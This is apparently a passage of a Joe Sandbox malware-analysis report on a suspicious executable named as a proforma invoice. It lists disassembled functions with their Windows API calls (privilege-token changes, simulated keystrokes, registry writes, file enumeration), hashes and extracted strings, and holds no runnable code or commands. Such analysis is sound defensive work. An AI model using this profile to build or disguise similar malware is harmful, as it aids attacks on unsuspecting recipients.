                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __getptd_noexit__lock_file
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2597487223-0
                                                                                                                    • Opcode ID: 142b017afd2e1069faf3f1a2163f165f47b2f7b1661fc3d17f42483eb3e0fd47
                                                                                                                    • Instruction ID: c66ae17dfaee8bb5e75f32ef6b91162170b587048b91dfcd7be619df45cd0f18
                                                                                                                    • Opcode Fuzzy Hash: 142b017afd2e1069faf3f1a2163f165f47b2f7b1661fc3d17f42483eb3e0fd47
                                                                                                                    • Instruction Fuzzy Hash: E7F0AF3196160AEBDF12BFB48C0E7AE76A0AF00325F15C514F42C9A191CBB88971DF52
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(?,?,003152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00254E7E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3664257935-0
                                                                                                                    • Opcode ID: 277c205c536d7a83afe513ff66e6a7e52bd5c2d0bc1ac755a4f44b637e080448
                                                                                                                    • Instruction ID: 5acac57712cc18ebbc95754a37aaeeb8bc06ceabf0c0cd67fafa083c882d6412
                                                                                                                    • Opcode Fuzzy Hash: 277c205c536d7a83afe513ff66e6a7e52bd5c2d0bc1ac755a4f44b637e080448
                                                                                                                    • Instruction Fuzzy Hash: 0AF03071521752CFCB34AF64E495816F7E1BF1432A320897EEADB82621C7719898DF44
                                                                                                                    APIs
                                                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002707B0
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongNamePath_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2514874351-0
                                                                                                                    • Opcode ID: c4f8f92a5f38371d9f34b3864653d9015a9891ac7fde5d656b9a390cbfa50b58
                                                                                                                    • Instruction ID: 1a7903964399add20ed79df0f6c8ad3a07f14fc6b4019f766eb1a846db0b4032
                                                                                                                    • Opcode Fuzzy Hash: c4f8f92a5f38371d9f34b3864653d9015a9891ac7fde5d656b9a390cbfa50b58
                                                                                                                    • Instruction Fuzzy Hash: 4CE0CD3694512857C720E658AC0AFEA77DDDF887A1F0441F6FC0CD7248D9709C918AD4
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wfsopen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 197181222-0
                                                                                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                    • Instruction ID: dc94ae87012001a0849aa80d4de30bd5f8c0cbfb24454f2bd023bace3df93e85
                                                                                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                    • Instruction Fuzzy Hash: 9FB0927644020C77CE012A82EC02A497B199B41764F408020FF0C18162A6B3A6749A89
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 00C52179
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013476899.0000000000C4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C4F000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_c4f000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                    • Instruction ID: c515d3a8df55d382f386705f70e15161f5965ea81c48076b5a764c923263aef5
                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                    • Instruction Fuzzy Hash: 0AE0E67494020DDFDB00DFB4D54969E7BF4EF04302F100161FD05D2280D6309D509A62
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 002DCB37
                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002DCB95
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002DCBD6
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002DCC00
                                                                                                                    • SendMessageW.USER32 ref: 002DCC29
                                                                                                                    • _wcsncpy.LIBCMT ref: 002DCC95
                                                                                                                    • GetKeyState.USER32(00000011), ref: 002DCCB6
                                                                                                                    • GetKeyState.USER32(00000009), ref: 002DCCC3
                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002DCCD9
                                                                                                                    • GetKeyState.USER32(00000010), ref: 002DCCE3
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002DCD0C
                                                                                                                    • SendMessageW.USER32 ref: 002DCD33
                                                                                                                    • SendMessageW.USER32(?,00001030,?,002DB348), ref: 002DCE37
                                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 002DCE4D
                                                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 002DCE60
                                                                                                                    • SetCapture.USER32(?), ref: 002DCE69
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 002DCECE
                                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002DCEDB
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002DCEF5
                                                                                                                    • ReleaseCapture.USER32 ref: 002DCF00
                                                                                                                    • GetCursorPos.USER32(?), ref: 002DCF3A
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 002DCF47
                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 002DCFA3
                                                                                                                    • SendMessageW.USER32 ref: 002DCFD1
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 002DD00E
                                                                                                                    • SendMessageW.USER32 ref: 002DD03D
                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 002DD05E
                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 002DD06D
                                                                                                                    • GetCursorPos.USER32(?), ref: 002DD08D
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 002DD09A
                                                                                                                    • GetParent.USER32(?), ref: 002DD0BA
                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 002DD123
                                                                                                                    • SendMessageW.USER32 ref: 002DD154
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 002DD1B2
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 002DD1E2
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 002DD20C
                                                                                                                    • SendMessageW.USER32 ref: 002DD22F
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 002DD281
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 002DD2B5
                                                                                                                      • Part of subcall function 002525DB: GetWindowLongW.USER32(?,000000EB), ref: 002525EC
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002DD351
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                    • String ID: @GUI_DRAGID$F$pb1
                                                                                                                    • API String ID: 3977979337-1404435443
                                                                                                                    • Opcode ID: 6f76d8e2bbfa239703def1d30e44b9ded4baedd8135ce2e0a68c5ca60de572f5
                                                                                                                    • Instruction ID: 825d299bc9d488ab46584d5db04e4bbe4b55eb929fe587f38adb150cb7ec028d
                                                                                                                    • Opcode Fuzzy Hash: 6f76d8e2bbfa239703def1d30e44b9ded4baedd8135ce2e0a68c5ca60de572f5
                                                                                                                    • Instruction Fuzzy Hash: 5442BA34624642AFD721CF28D848AAABBE5FF49314F24451BF696873A0C731DC64DF92
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_memset
                                                                                                                    • String ID: ]0$3c&$DEFINE$P\0$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_&
                                                                                                                    • API String ID: 1357608183-1122871721
                                                                                                                    • Opcode ID: 808482b5a2fafea7e61267295d758db32bd3a5a40d3c3023c8ca992ddd51cda1
                                                                                                                    • Instruction ID: 31f16b010830be6f1d6d6e8a2ce9c7827f5f8e8e21e9b68d181f6619136a4140
                                                                                                                    • Opcode Fuzzy Hash: 808482b5a2fafea7e61267295d758db32bd3a5a40d3c3023c8ca992ddd51cda1
                                                                                                                    • Instruction Fuzzy Hash: 1293B371E20216DFDB24CF58D8817ADB7B1FF49714F24816AE949EB281EB709D91CB40
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 002548DF
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0028D665
                                                                                                                    • IsIconic.USER32(?), ref: 0028D66E
                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 0028D67B
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0028D685
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0028D69B
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0028D6A2
                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0028D6AE
                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0028D6BF
                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0028D6C7
                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 0028D6CF
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0028D6D2
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0028D6E7
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0028D6F2
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0028D6FC
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0028D701
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0028D70A
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0028D70F
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0028D719
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0028D71E
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0028D721
                                                                                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 0028D748
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 4125248594-2988720461
                                                                                                                    • Opcode ID: 8e9c938a1fa8dd764345261983afa1de6d23c9938dfd26b066caa52667f40cf3
                                                                                                                    • Instruction ID: 541300d1ba30bb564c270efb74530801f0365635a4b740d3a36a2ccc681fc193
                                                                                                                    • Opcode Fuzzy Hash: 8e9c938a1fa8dd764345261983afa1de6d23c9938dfd26b066caa52667f40cf3
                                                                                                                    • Instruction Fuzzy Hash: BE31B375E91318BBEB202F61AC89F7F7F6CEB44B50F144026FA05EA1D1D6B05D10ABA4
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002A87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A882B
                                                                                                                      • Part of subcall function 002A87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A8858
                                                                                                                      • Part of subcall function 002A87E1: GetLastError.KERNEL32 ref: 002A8865
                                                                                                                    • _memset.LIBCMT ref: 002A8353
                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002A83A5
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 002A83B6
                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002A83CD
                                                                                                                    • GetProcessWindowStation.USER32 ref: 002A83E6
                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 002A83F0
                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002A840A
                                                                                                                      • Part of subcall function 002A81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002A8309), ref: 002A81E0
                                                                                                                      • Part of subcall function 002A81CB: CloseHandle.KERNEL32(?,?,002A8309), ref: 002A81F2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                    • String ID: $default$winsta0
                                                                                                                    • API String ID: 2063423040-1027155976
                                                                                                                    • Opcode ID: 8cf3144fd9c65a209042ad45a6b39ec7aff53a6f59fc4be126288ad78d45e6f9
                                                                                                                    • Instruction ID: d5bb6cdd2c43a6a8e674b2768e031ede7f27ccddcee9d59bb09912094614b5a0
                                                                                                                    • Opcode Fuzzy Hash: 8cf3144fd9c65a209042ad45a6b39ec7aff53a6f59fc4be126288ad78d45e6f9
                                                                                                                    • Instruction Fuzzy Hash: 6C817B71C1120AAFDF119FA4DD49AEEBBB9EF05304F14816AFD15A2261DF318E24DB60
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 002BC78D
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002BC7E1
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002BC806
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002BC81D
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 002BC844
                                                                                                                    • __swprintf.LIBCMT ref: 002BC890
                                                                                                                    • __swprintf.LIBCMT ref: 002BC8D3
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                    • __swprintf.LIBCMT ref: 002BC927
                                                                                                                      • Part of subcall function 00273698: __woutput_l.LIBCMT ref: 002736F1
                                                                                                                    • __swprintf.LIBCMT ref: 002BC975
                                                                                                                      • Part of subcall function 00273698: __flsbuf.LIBCMT ref: 00273713
                                                                                                                      • Part of subcall function 00273698: __flsbuf.LIBCMT ref: 0027372B
                                                                                                                    • __swprintf.LIBCMT ref: 002BC9C4
                                                                                                                    • __swprintf.LIBCMT ref: 002BCA13
                                                                                                                    • __swprintf.LIBCMT ref: 002BCA62
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                    • API String ID: 3953360268-2428617273
                                                                                                                    • Opcode ID: 5ce33659010c2f9345eb47e2d72955625fd1986aac590fd1fccdd74ff6e17cef
                                                                                                                    • Instruction ID: a45bc348643dbdf815cc3da61dbab6b43ce552e10445d99d340e440a6456c27f
                                                                                                                    • Opcode Fuzzy Hash: 5ce33659010c2f9345eb47e2d72955625fd1986aac590fd1fccdd74ff6e17cef
                                                                                                                    • Instruction Fuzzy Hash: 98A13CB2429304ABC704EFA4C886DAFB7ECBF94701F404919F985C6191EB34DA58CF66
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 002BEFB6
                                                                                                                    • _wcscmp.LIBCMT ref: 002BEFCB
                                                                                                                    • _wcscmp.LIBCMT ref: 002BEFE2
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 002BEFF4
                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 002BF00E
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 002BF026
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002BF031
                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 002BF04D
                                                                                                                    • _wcscmp.LIBCMT ref: 002BF074
                                                                                                                    • _wcscmp.LIBCMT ref: 002BF08B
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002BF09D
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00308920), ref: 002BF0BB
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 002BF0C5
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002BF0D2
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002BF0E4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1803514871-438819550
                                                                                                                    • Opcode ID: 6266a726486589a4bd8f02e278f4276a3f48a31e8048673d4d585b87665d21d8
                                                                                                                    • Instruction ID: baa611e6f9344e20b955ef3db7eaaa33e4ac5ddba27d609573cad4533abf4da3
                                                                                                                    • Opcode Fuzzy Hash: 6266a726486589a4bd8f02e278f4276a3f48a31e8048673d4d585b87665d21d8
                                                                                                                    • Instruction Fuzzy Hash: A83116329112096ACB90EFB4ED4CAEE77AC9F483A0F144572E845E20A1EB70DE50CE54
                                                                                                                    APIs
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D0953
                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,002DF910,00000000,?,00000000,?,?), ref: 002D09C1
                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002D0A09
                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 002D0A92
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 002D0DB2
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 002D0DBF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                    • API String ID: 536824911-966354055
                                                                                                                    • Opcode ID: a8e677a1f4d78464d31feeffa8603e8169502ab59929452455242e3f60be8662
                                                                                                                    • Instruction ID: b197ca8e18e5866096f9118f77658f18969d21f06c9182bf9c7dd298e478e7d9
                                                                                                                    • Opcode Fuzzy Hash: a8e677a1f4d78464d31feeffa8603e8169502ab59929452455242e3f60be8662
                                                                                                                    • Instruction Fuzzy Hash: D50249756206019FCB54EF14C895E2AB7E5EF89314F04845EF88A9B3A2CB30ED65CF85
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0D/$0E/$0F/$3c&$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG/$_&
